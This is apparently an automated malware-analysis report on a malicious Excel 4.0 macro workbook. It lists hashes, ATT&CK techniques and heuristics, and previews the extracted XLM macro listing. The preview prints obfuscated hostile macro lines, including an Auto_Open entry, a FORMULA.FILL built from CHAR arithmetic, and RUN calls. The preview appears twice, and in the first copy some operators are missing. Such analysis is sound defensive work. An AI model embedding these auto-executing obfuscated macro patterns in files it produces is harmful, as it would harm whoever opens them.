Office (OLE) malware analysis — malicious · 6b9aa7e441e4b089

MALICIOUS

Office (OLE)

162.0 KB Created: 2020-05-14 14:18:48 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: 00c5e69ed4b9559cc349f01c54270d36 SHA-1: b85f89ced951837f1677d8183ff027d79d3e1605 SHA-256: 6b9aa7e441e4b089d461d1a6d0b3834fc487c2dc0ddb9afd6d65450034012f88

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro-enabled workbook. Critical heuristics indicate the presence of an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The macro sheet contains a 'RUN' function call, suggesting it attempts to execute an external program or script. This is a strong indicator of a downloader or initial execution stage.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128875 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	128875 bytes
SHA-256: `3a99d750ef9fd0acb1507d1895ab6dee5e3f39847f7d6d18af97398bebc0d807`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!FL6191 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,EJ53,"",-59.10003906250000227374 ' Sheet,GG62,"",-1.88235294117647056211 ' Sheet,FT83,"",-17.87500000000000000000 ' Sheet,BA105,"",-207.00000000000000000000 ' Sheet,BK132,"",3.02083333333333348136 ' Sheet,JU146,"",26.10001953124999829470 ' Sheet,CU174,"",0.26397515527950315972 ' Sheet,EB176,"",8.75609756097560953947 ' Sheet,CQ228,"",-0.53043478260869569851 ' Sheet,BI233,"",146.00000000000000000000 ' Sheet,HW237,"",12.87500000000000000000 ' Sheet,J241,"",0.49440298507462687727 ' Sheet,GM284,"",-0.70329670329670335160 ' Sheet,IB351,"",0.28136293236964377007 ' Sheet,FZ354,"",-286.40000000000003410605 ' Sheet,EX416,"SET.VALUE(HD11006,-42.00000000000000000000-GET.CELL(17,CQ51777))","" ' Sheet,EX417,RUN(GN59339),"" ' Sheet,DP511,"",1.08064516129032250902 ' Sheet,IW599,"",0.07181818181818182267 ' Sheet,JG646,"",0.47586206896551724865 ' Sheet,CL654,"",0.11142061281337047041 ' Sheet,IG658,"",138.00000000000000000000 ' Sheet,FA680,"",3.14285714285714279370 ' Sheet,GX730,"",396.00000000000000000000 ' Sheet,DZ779,"",-52.00000000000000000000 ' Sheet,IR912,"",474.00000000000000000000 ' Sheet,DJ914,"",1.11290322580645151263 ' Sheet,FB1007,"",37.00000000000000000000 ' Sheet,R1014,"",-141.00000000000000000000 ' Sheet,HJ1041,"",-63.87500000000000000000 ' Sheet,GV1088,"",0.83870967741935487094 ' Sheet,DT1139,"",-0.45217391304347825942 ' Sheet,EL1140,"FORMULA.FILL(CHAR(DS48365/DD34470)&CHAR(HD11006+JT25515)&CHAR(H24043-ES59058)&CHAR(BB20430/BZ61896)&CHAR(H24043+HT54376)&CHAR(HH49818HB45437)&CHAR(BB20430+Z20494)&CHAR(HD11006EU9018)&CHAR(H61+DS53913)&CHAR(GO32820BE26991)&CHAR(HH49818-HF28911)&CHAR(H24043-BY60671)&CHAR(BL58941HH49982)&CHAR(HD11006-FU34190)&CHAR(JF32736GA47442)&CHAR(HD11006HT49618)&CHAR(HH49818-J2060)&CHAR(DA30013/HK45263)&CHAR(JF32736DV17047)&CHAR(H24043+FO60205)&CHAR(DA30013EU5283)&CHAR(HH49818/EY11908)&CHAR(BL58941IW64858)&CHAR(BB20430JD58817)&CHAR(HD11006-HT39341)&CHAR(BB20430-EB52541)&CHAR(H24043/Q5533)&CHAR(BB20430DT28754)&CHAR(H61/HJ49838)&CHAR(HD11006GN43742)&CHAR(H24043-IH41597)&CHAR(JF32736/EI24343)&CHAR(H61/FI54386)&CHAR(JF32736+HN33601)&CHAR(H24043BI48925)&CHAR(JF32736-X40896)&CHAR(HD11006/EM42001)&CHAR(HD11006IE62789)&CHAR(BB20430+GH1459)&CHAR(JF32736+ED18438)&CHAR(GO32820-DE31852)&CHAR(DS48365+CP51108)&CHAR(H61-CG52412)&CHAR(HH49818+JN26902)&CHAR(H24043+FP49909)&CHAR(DS48365-GU46331)&CHAR(DS48365*BI63797),EL1141)","" ' Sheet,EL1142,RUN(CE26066),"" ' Sheet,GL1189,"",-26.79999999999998294697 ' Sheet,CP1199,"",19.00000000000000000000 ' Sheet,FB1200,"",0.97426470588235292158 ' Sheet,FK1225,"",-49.00000000000000000000 ' Sheet,S1303,"",-13.79999999999998294697 ' Sheet,EV1304,"",-0.84905660377358493918 ' Sheet,JR1310,"",3.00000000000000000000 ' Sheet,DU1315,"",309.00000000000000000000 ' Sheet,IV1322,"",1.27419354838709675271 ' Sheet,JD1357,"",-0.35652173913043477826 ' Sheet,JJ1385,"",-265.75000000000000000000 ' Sheet,HS1388,"",2.22068965517241334595 ' Sheet,DZ1408,"",-284.00000000000000000000 ' Sheet,GH1459,"",208.00000000000000000000 ' Sheet,FL1465,"",-79.00000000000000000000 ' Sheet,FC1474,"",0.16732438831886345398 ' Sheet,EH1480,"",-1.45454545454545458583 ' Sheet,JJ1484,"",-9.31707317073170671051 ' Sheet,DJ1531,"",-0.27486910994764396365 ' Sheet,CI1545,"",311.00000000000000000000 ' Sheet,U1565,"",223.75000000000000000000 ' Sheet,DU1714,"",127.00000000000000000000 ' Sheet,HU1717,"",-58.00000000000000000000 ' Sheet,DZ1727,"",15.00000000000000000000 ' Sheet,DG1762,"",1.36363636363636353543 ' Sheet,I1821,"",0.36263736263736262577 ' Sheet,BS1829,"",-5.0000000000 ... (truncated)

SHA-256: 3a99d750ef9fd0acb1507d1895ab6dee5e3f39847f7d6d18af97398bebc0d807

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FL6191 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,EJ53,"",-59.10003906250000227374
'  Sheet,GG62,"",-1.88235294117647056211
'  Sheet,FT83,"",-17.87500000000000000000
'  Sheet,BA105,"",-207.00000000000000000000
'  Sheet,BK132,"",3.02083333333333348136
'  Sheet,JU146,"",26.10001953124999829470
'  Sheet,CU174,"",0.26397515527950315972
'  Sheet,EB176,"",8.75609756097560953947
'  Sheet,CQ228,"",-0.53043478260869569851
'  Sheet,BI233,"",146.00000000000000000000
'  Sheet,HW237,"",12.87500000000000000000
'  Sheet,J241,"",0.49440298507462687727
'  Sheet,GM284,"",-0.70329670329670335160
'  Sheet,IB351,"",0.28136293236964377007
'  Sheet,FZ354,"",-286.40000000000003410605
'  Sheet,EX416,"SET.VALUE(HD11006,-42.00000000000000000000-GET.CELL(17,CQ51777))",""
'  Sheet,EX417,RUN(GN59339),""
'  Sheet,DP511,"",1.08064516129032250902
'  Sheet,IW599,"",0.07181818181818182267
'  Sheet,JG646,"",0.47586206896551724865
'  Sheet,CL654,"",0.11142061281337047041
'  Sheet,IG658,"",138.00000000000000000000
'  Sheet,FA680,"",3.14285714285714279370
'  Sheet,GX730,"",396.00000000000000000000
'  Sheet,DZ779,"",-52.00000000000000000000
'  Sheet,IR912,"",474.00000000000000000000
'  Sheet,DJ914,"",1.11290322580645151263
'  Sheet,FB1007,"",37.00000000000000000000
'  Sheet,R1014,"",-141.00000000000000000000
'  Sheet,HJ1041,"",-63.87500000000000000000
'  Sheet,GV1088,"",0.83870967741935487094
'  Sheet,DT1139,"",-0.45217391304347825942
'  Sheet,EL1140,"FORMULA.FILL(CHAR(DS48365/DD34470)&CHAR(HD11006+JT25515)&CHAR(H24043-ES59058)&CHAR(BB20430/BZ61896)&CHAR(H24043+HT54376)&CHAR(HH49818*HB45437)&CHAR(BB20430+Z20494)&CHAR(HD11006*EU9018)&CHAR(H61+DS53913)&CHAR(GO32820*BE26991)&CHAR(HH49818-HF28911)&CHAR(H24043-BY60671)&CHAR(BL58941*HH49982)&CHAR(HD11006-FU34190)&CHAR(JF32736*GA47442)&CHAR(HD11006*HT49618)&CHAR(HH49818-J2060)&CHAR(DA30013/HK45263)&CHAR(JF32736*DV17047)&CHAR(H24043+FO60205)&CHAR(DA30013*EU5283)&CHAR(HH49818/EY11908)&CHAR(BL58941*IW64858)&CHAR(BB20430*JD58817)&CHAR(HD11006-HT39341)&CHAR(BB20430-EB52541)&CHAR(H24043/Q5533)&CHAR(BB20430*DT28754)&CHAR(H61/HJ49838)&CHAR(HD11006*GN43742)&CHAR(H24043-IH41597)&CHAR(JF32736/EI24343)&CHAR(H61/FI54386)&CHAR(JF32736+HN33601)&CHAR(H24043*BI48925)&CHAR(JF32736-X40896)&CHAR(HD11006/EM42001)&CHAR(HD11006*IE62789)&CHAR(BB20430+GH1459)&CHAR(JF32736+ED18438)&CHAR(GO32820-DE31852)&CHAR(DS48365+CP51108)&CHAR(H61-CG52412)&CHAR(HH49818+JN26902)&CHAR(H24043+FP49909)&CHAR(DS48365-GU46331)&CHAR(DS48365*BI63797),EL1141)",""
'  Sheet,EL1142,RUN(CE26066),""
'  Sheet,GL1189,"",-26.79999999999998294697
'  Sheet,CP1199,"",19.00000000000000000000
'  Sheet,FB1200,"",0.97426470588235292158
'  Sheet,FK1225,"",-49.00000000000000000000
'  Sheet,S1303,"",-13.79999999999998294697
'  Sheet,EV1304,"",-0.84905660377358493918
'  Sheet,JR1310,"",3.00000000000000000000
'  Sheet,DU1315,"",309.00000000000000000000
'  Sheet,IV1322,"",1.27419354838709675271
'  Sheet,JD1357,"",-0.35652173913043477826
'  Sheet,JJ1385,"",-265.75000000000000000000
'  Sheet,HS1388,"",2.22068965517241334595
'  Sheet,DZ1408,"",-284.00000000000000000000
'  Sheet,GH1459,"",208.00000000000000000000
'  Sheet,FL1465,"",-79.00000000000000000000
'  Sheet,FC1474,"",0.16732438831886345398
'  Sheet,EH1480,"",-1.45454545454545458583
'  Sheet,JJ1484,"",-9.31707317073170671051
'  Sheet,DJ1531,"",-0.27486910994764396365
'  Sheet,CI1545,"",311.00000000000000000000
'  Sheet,U1565,"",223.75000000000000000000
'  Sheet,DU1714,"",127.00000000000000000000
'  Sheet,HU1717,"",-58.00000000000000000000
'  Sheet,DZ1727,"",15.00000000000000000000
'  Sheet,DG1762,"",1.36363636363636353543
'  Sheet,I1821,"",0.36263736263736262577
'  Sheet,BS1829,"",-5.0000000000
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.